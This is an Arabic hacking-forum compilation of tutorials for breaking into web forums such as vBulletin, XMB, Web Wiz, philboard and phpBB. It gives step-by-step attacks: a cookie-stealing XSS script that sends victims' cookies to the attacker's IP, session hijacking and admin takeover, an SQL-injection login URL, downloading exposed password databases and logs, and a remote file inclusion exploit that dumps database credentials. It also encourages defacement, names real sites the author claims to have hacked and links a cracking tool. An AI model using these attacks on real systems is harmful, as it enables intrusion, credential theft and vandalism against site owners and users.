الموضوع : اختراق ال vBulletin
المتطلبات : WebServer (تركيب سيرفر على جهازك الشخصي) + متصفح انترنت (اكسبلورر) .
المستوى : متوسط
ملاحظة : هذه الطريقة ليست لل vBulletin فقط !! يمكن ان تجربها على انواع اخرى من المنتديات .
----------
الثغرة :
---------
تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل
بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد ال HTML ..
قم بكتابة موضوع جديد او رد (في منتدى يدعم ال HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود :
************************************************** ************************************************** ********.write('<img
src="http://my_ip_address/'+****************+'">';</script>
مع ملاحظة تغير ال IP Adress الى رقم ال IP الخاص بك .
وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء
من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم
الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) .
وبعد ان تتم العملية بنجاح قم بفتح ملف ال Log الخاص بالسيرفر الذي يحتويه جهازك ..
مثال لو كان السيرفر اباتشي .. فتاح المجلد Apche واختر logs واختر Acces Log .
ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ
ابحث عن الكود الخاص بالباسورد .. مثال :
GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb
ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f8;%20bbthreadview[54
20]=1012444064;%20bblastvi
sit=1011983161
فكر قليلا الان .. اين الباسورد ؟؟
الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟
قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل
http://www.victim.com/vb/index.php?bbuserid=[userid]&bbpassword=[password hash]
ستجد عبارة : " أهلا بعودتك يا ( اسم الذي سرقت منه الكوكيز....) "
في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) ..
لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص
وثم قم بتسجيل الخروج .. ثم اذهب الى اداة Forgot Password .. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن ..
اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. !
------------
الحل
-----------
للحماية من هذه الثغرة قم باغلاق ال HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... )
(واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت )
كما يجب اغلا كود ال IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة ************************************************** ********** فاذا وضعت <img> او ************************************************** **** او
اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ .
Be Secret .. Dont' be Lamer .
تاريخ اكتشاف الثغرة : 31 - 1 - 2002
تم تجربتها على الاصدار 2.2.0 وهي تعمل بنجاح .
أرجو أن تستخدموا هذه الطريقة ضد العدو وألا تستخدموها ضد إخوانكم العرب والمسلمين
======================================
إختراق منتديات VP
======================================
اختراق المنتديات بس بمنتديات vb
. قم بالتسجيل كعضو مع مراعاة التسجيل ببريد حقيقي
2. تدخل المنتدى كعضو بأسم المستخدم وكلمة السر الخاصة بك
3. أضغط على زر ( الأعضاء ) الموجود بالأعلي أو members .
أو العنوان التفصيلي التالي :
http://URL/memberlist.php URL = العنوان المستضيف للمنتدى
مثل = - .com
4. أضغط على أي مستخدم من المستخدمين عشوائيا وستلاحظ ظهور عنوان طويل بالأعلي في مستطيل العناوين address bar .
سيظهر لك عنوان يحمل أرقاما وأحرفا عشوائية كالشكل التالي :
http://URL/member.php?soitgoe68e45u...info&userid=266 هذا العنوان الطويل يعني = عرض بيانات المستخدم رقم 266
5. بكل بساطة غير الرقم من 266 الى الرقم واحد هكذا
http://URL/member.php?soitgoe68e45u...etinfo&userid=1 العضو رقم واحد عادة وأفتراضيا يكون هو المدير للمنتدى administrator .
(((== ها أنت تجتاز الخطوة الأولى بنجاح وتعرف من هو المدير للموقع == ))
أحفظ أسم المدير حيث أنك ستحتاجه بالخطوة التالية
6. أكتب العنوان التالي مع تغيير المتغييرات التي ساذكرها :
http://URL/member.php?action=login&...VALI...L.HERE'+WHE RE+username='ADMIN''.'
العنوان هذا ستقوم بتغيير الكلمات التالية
URL = كما ذكرنا سابقا الموقع المستضيف للمنتدى
VALIDUSER = أسم المستخدم الخاص بك
VALIDPASS = كلمة السر الخاصة بك
YOUR@EMAIL.HERE = البريد الذي سجلت به بالمنتدى
ADMIN = أسم مدير المنتدى ( الذي أكتفشته بالخطوة السابقة )
7. بعد أن تغيير جميع ما سبق وتتأكد منه تقوم بعمل أنعاش للمنتدى عدة مرات ****************************************** .
8. ثم ترجع لصفحة المنتدى الرئيسية
http://url/index.php ثم حاول الدخول بأستخدام أسم المستخدم الخاص بك وأستعمال كلمة سر خاطئة ( يجب أن تكون خاطئة ) .
بالطيع ستظهر لك الصفحة التعيسة التي تقول :
أنت قمت بكتابة كلمة سر خاطئة
you typed in the wrong password
9. بكل بساطة أضغط على
نسيت كلمة السر
forgot password
والتي ستقوم بأرسال كلمة السر الى بريدك الألكتروني
10. أفتح بريدك وستجد كلمة السر الخاصة بمدير المنتدى
ملاحظة هذه الطريقة قديمة وأغلب المنتديات قاموا بإغلاق هذه الثغرة يعني لا تستطيع فعلها إلا مع منتديات اليوم
======================================
إختراق منتديات xmb
======================================
تعتبر المنتديات من نوع xmb من المنتديات التي اكتيبت شهره واسعه في مجالها وحالها حال الكثير من الأنواع الأخرى من المنتديات من وجود الثغرات والأختراقات فلا يوجد شيء كامل على وجه الأرض الا الله عز وجل..
وصف للثغره::
وقد تم اكتشاف ثغره جديده في هذا النوع من المنتديات مما يمكنك ان تكون المدير على المنتدى او تكون مشرف اوي اي عضو اخر
الأصدار المصاب:::
XMB 1.6 Magic Lantern Final
الشرح والتطبيق:::
جاء وقت الشغل والجد<<< سوف اقوم بتقسيم الدرس على خطوات حتى يفهم ويكون اوووضح وأسهل:
1- عليك بالذهاب الى موقع جوجل
http://www.google.com/ 2- اكتب في منطقة البحث XMB 1.6 Magic Lantern Final
3- سوف ترى منتديات كثييييييييره اكثرها مصابه بهذه الثغره لكن رجاااء
لاتقرب المنتديات العربية وعليك بتحذيرها من الثغره الموجوده.
4- اضغط على اي منتدى وقم بكتابة الكلمة التالية بعد عنوان المنتدى
index_log.log يعني راح يكون متل هدا
http://www.******.com/massegboard/index_log.log 5- راح ينزل عندك ملف والملف عباره عن ملف مثل الكوكيز كبير وفيه اسماء
المستخدمين والباسورد وأشياء ثانيه ماتهمنا.
6- الأن عليك بالبحث في المنتدى عن اسم المدير وذلك بالذهاب الى المواضيع
وتشوف الأسماء والي تلقى تحت اسمه ادمن ستريتور انسخ اسمه.
7- افتح الملف الي نزلته من الموقع وسوي بحث عن اسم المدير راح يجيك متل
هذا مثلا::
xmbuser=admin
واباس راح تلقاه قدامه مثل هذا
xmbpw=1faeb6747a31c854800ddf3c62b1717a
8- طبعا الباس في هذه الحاله مشفر وفك التشفير صعب لهذا الغرض قامت شركة
CCI بتصميم برنامج يقوم بهذا الغرض وهذه وصلت البرنامج
ftp://www.cafecounterintelligence.com/cci/chigger.exe ======================================
إختراق منتديات Web Wiz Guide
======================================
مثال:http://host.basharnet.com/forum
هذه الطريقة أقدمها لكل الهاكرز المبتدئين لأنها سهلة جدا وما بدا غير تحمل هالملف وتتصفح الباسوورد على كيفيك دون تشفير يعني إذا كنت ما بتعرف شي عن الهاكر بقرائتك لهذه الثغرة تستطيع أن تخترق منتدى
أغلب المنتديات مصابة بهذه الثغرة
بسم الله الرحمن الرحيم
الشرح: ثغرة تصيب منتديات Web Wiz Guide
أولا إذهب إلى google
اكتب
Web Wiz forum
وانتظر لحد ماتطلع لك المواقع الي تدعم هذا المنتدى ادخل المنتدى واكتب بعد forum
admin/wwforum.mdb
حمل الملف وادخل عليه عن طريق microsoft office access
بعد ماتاخذ باسوورد المشرف العام اذهب إلى admin
سجل اسمك والباسوورد
الآن أنت في لوحة التحكم
ها ها ها ها
بس ما حدا يخترق المنتديات الوجودة في محرك البحث قوقل التي قمت باختراقها أنا
هذا منتدى قمت باختراقه لاحقا
http://www.plasticcube.com/Forum/default.aspاكتبوا فيه ما تشائون يا أعضاء وزوار منتديا عرب للأبد
وهي منندى ثان
هذا منتدى دينيماركي
http://www.naturklub.dk/forum/ثغرة في معظم منتديات ال asp
++++++++++++++++++++++++++
سأذكر احد الثغرات في بعض اللغات الديناميكية(asp) active server pages
وعليها فقس
طبعا هذه اللغة وللأسف بها ثغرات قوية جدا وخصوصا في التعامل مع قواعد بياناتها .
بشكل مختصر هذه اللغة تعتبر من لغات البرمجة الديناميكية التفاعلية لبرمجة مواقع الانترنت ولها ميزة بأن الكود لها مخفي والكثير من الناس يفضلونها لانها مدعومة من ما يكروسوفت على عكس وجهة نظري لاني ما أطيق اي برنامج من ما يكروسوفت الا اذا لم يوجد له بديل ...الخ
وتعتمد قواعد بياناتها على ثلاثة أنواع هي :
sqlserver && sql && M.S Access
واما قاعدة بيانات ما يكروسوفت أكسس فثغراتها من أبسط الثغرات بحيث انك اذا وجدت امتدادا واسم قاعدة البانات فقط فانك تستطيع تحميلها على جهازك مباشرة وتصفح جميع الباسوردات بسهولة ويسر وبدون تشفير أيضا .
واليكم المثال من أحد المنتديات التي تتضح جليه بها هذه الثغرة وهي باسم philboard.asp
مثل هذا المنتدى
http://www.khill.co.uk/forum/philboard.asp وطريقة ايجاد مثل هذا النوع منتديات اذهب الى جوجل كما ذكرنا سابقا وابحث عن -------------- > philboard وانتظر النتائج ....
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
كيف تحمل قاعدة البيانات ؟
اكتب هذا الامتداد
وبعد ذلك حاول ان يكون المنتدى به عديد قليل من المواضيع حتى يكون حجم قاعدة البيانات صغير جدا للتطبيق والتسليم بسرعة
وهذا هو امتداد واسم قاعدة البيانات لقاعدة البيانات
database/philboard.mdb
وتكتبه بعد اسم الموقع والمنتدى مثل
http://www.khill.co.uk/forum/database/philboard.mdb ولا بد لكي تقرا قاعدة البيانات ان يكون في جهازك برنامج ما يكروسوفت أكسس
وبعد فتح قاعدة البيانات ستجد بداخلها عدة جداول فيها جميع محتويات قاعدة البيانات
من ضمنها وهو المهم جدول المستخدمين ال users
وستجد اول اسم عالبا هو admin وهو اسم المدير العام مع الباسوورد
الآن وبعد ان حصلنا على الاسم والباسوورد ماذا تبقى ؟
لم يبقى الى الدخول للوحة التحكم للمنتدى للتحكم فيه وكأنك المشرف العام
philboard_admin.asp وهذا عنوانها
مثال
http://www.khill.co.uk/forum/philboard_admin.asp ادخل وستجد كل منتدى وبجانبة كلمه delete و edit
احذف كل المنتديات وأنشا منتديات جديدة واكتب عليها
hacked by xxxxxxxxxx
xxxxxxx يعني اسمك ,,,
من وين ؟
من المربعين الموجودة بالاسفل في لوحة التحكم
اكتب في المستطيل hacked by xxxxxxxxxx
وفي المربع الي اسفله ضع رسالة تود توجيهها لاصحاب الموقع
واضغط add يعني اضافة
ومبرووووووووووووووووووووووووووووووووك ألف مبرووووووووووك اول اختراق لك
والحل لهذه الثغرة / هو تغيير مسار قواعد البيانات لكل منتدى او تغيير اسمها . فكما راينا ان منتديات philboard.asp قواعد بياناتها جميعا لها نفس الاسم والامتداد
__________________________________________________
تفضلو ثغرة في هاك الرد السريع منتدى PHPBB
عند تركيبك لهاك الرد السريع
سوف تجد هذا الكود
if ( $mode == 'smilies' )
{
define('IN_PHPBB', true);
include($phpbb_root_path . 'extension.inc';
include($phpbb_root_path . 'common.'.$phpEx);
include($phpbb_root_path . 'includes/functions_post.'.$phpEx);
generate_smilies('window', PAGE_POSTING);
exit;
}
دقق جيدا بهذا الكود
ثم أنشاء ملف جديد سمه extension.inc
وضع داخلها مثلا
شفرة
<?php
include('config'.'.php';
echo "DB Type: $dbms <br>";
echo "DB Host: $dbhost <br>";
echo "DB Name: $dbname <br>";
echo "DB User: $dbuser <br>";
echo "DB Pass: $dbpasswd <br>";
exit;
?>
يمكنك وض الخيارات التي تود مشاهدتها من الهاك
الآن وبكل سهولة بعد تنزيل extension.inc الى موقع يدعم البي اتش بي
أتجه الى هذا العنوان
URL:
http://[phpBB_Forum]/quick_reply.php?phpbb_root_path=http://[Your Server]/&mode=smiles
بسهولة أستبدل[phpBB_Forum]
بعنوان المنتدى المستهدف
[Your Server]
بعنوان الموقع الذي قمت بوضع الملف اللذي أنشائناه به
ماذا ترى؟؟؟
معلومات قاعدة البيانات بين ايديك
الحل لهذه الثغرة الخطيرة والتي شردت الكثير من المنتديات :
ببساطة أفتح الملف quick_reply.php
أبحث عن
if ( $mode == 'smilies' )
أَضف بعدها مباشرة
phpbb_root_path = "./";
وانشاءالله انحلت المشكلة
_________________
ثغره جديده في منتديات الvb
________________________
أرجوا عدم استخدام الثغرة على المسلمين وفيما يظر بالإسلام وفيما حرمه الله
لكن هذي كانت على النسخة التجريبية Beta
بالنسبة للثغرة فهي واضحة
وهي تستغل عن طريق الرسائل private.php وتقوم بسرقة الكوكيز ولكن بشرط يكون مفعل كود الهتمل في المنتدى وصاحب الثغرة يذكر انه قد يكون من الضروري تسجيل الدخول لك
طبعا استغلالها عن طريق تحويل الكود لملف html مع تغيير اسم الموقع ومجلد المنتدى
http://[victim]/forum/private.php PHP:
--------------------------------------------------------------------------------
From: Ferruh Mavituna
Subject: VBulletin Preview Message&nbs
p;- XSS Vuln
---------------------------------------
---------------
VBulletin Private Message&nbs
p;"Preview
Message" XSS Vulnerability
---------------------------------------
---------------
Any kind of XSS att
acks possibility.
-----------------------------------------------------
-
About VBulletin;
-----------------------------------------------------
-
PHP Based Popular Forum&
nbsp;Application
Vendor & Demo;
<a href="http://www.vbulletin.com/" target="_blank"><a href="http://www.vbulletin.com/" target="_blank">http://www.vbulletin.com/</a></a>
---------------------------------------
---------------
Vulnerable;
-----------------------------------------------------
-
vBulletin 3.0.0 Beta 2
<
br />vBulletin 2.x
---------------------------------------
---------------
-----------------------------------------------------
-
Vendor Status;
-----------------------------------------------------
-
I can not contact v
endor for this issue ! No patch available at&nb
sp;the moment;
-----------------------------------------------------
-
Solution;
-----------------------------------------------------
-
HTML Encoding like post&
nbsp;thread preview page;
-----------------------------------------------------
-
Exploit Code;
-----------------------------------------------------
-
<html>
<body>
<form action="http://[victim]/forum/private.php"&nbs
p;method="post"
name="vbform">
<input type="hidden" name="do" value="insertpm" />
<input type="hidden" name="pmid" value="" />
<input type="hidden" name="forward" value="" />
<input type="hidden" name="receipt" value="0" />
<input type="************************" class="bginput" name="title" value="" size="40"
tabindex="2" />
<************************area name="message" rows="20" cols="70" wrap="virtual"
tabindex="3"></************************area>
<input type="submit" class="button" name="sbutton" value="Post
Message"
accesskey="s" tabindex="4" />
<input type="submit" class="button" value="Preview
Message" accesskey="p"
name="preview" onclick="this.form.dopreview = true; return
true;this.form.submit()" tabindex="5" >
<input type="checkbox" name="savecopy" value="1" id="cb_savecopy"
checked="checked" />
<input type="checkbox" name="signature" value="1" id="cb_signature" />
<input type="checkbox" name="parseurl" value="1" id="cb_parseurl"
checked="checked" />
<input type="checkbox" name="disablesmilies" value="1"
id="cb_disablesmilies" />
</form>
************************************************** **********
//Set Values and Submit
// You
can write your own JS codes
var xss = "\">****************************************** **** **************alert(****************************** ******************.coo
kie)</script>";
************************************************.v bform.title.value=xss;
************************************************.v bform.preview.click();
</script>
</body>
</html>
*You may need login first
Ferruh Mavituna
Web Application Security
Consultant
Freelance Developer & Designer
<a href="http://ferruh.mavituna.com"
target="_blank"><a href="http://ferruh.mavituna.com" target="_blank">http://ferruh.mavituna.com</a></a>
__________________
طبعن المضوع منقول الى الفائده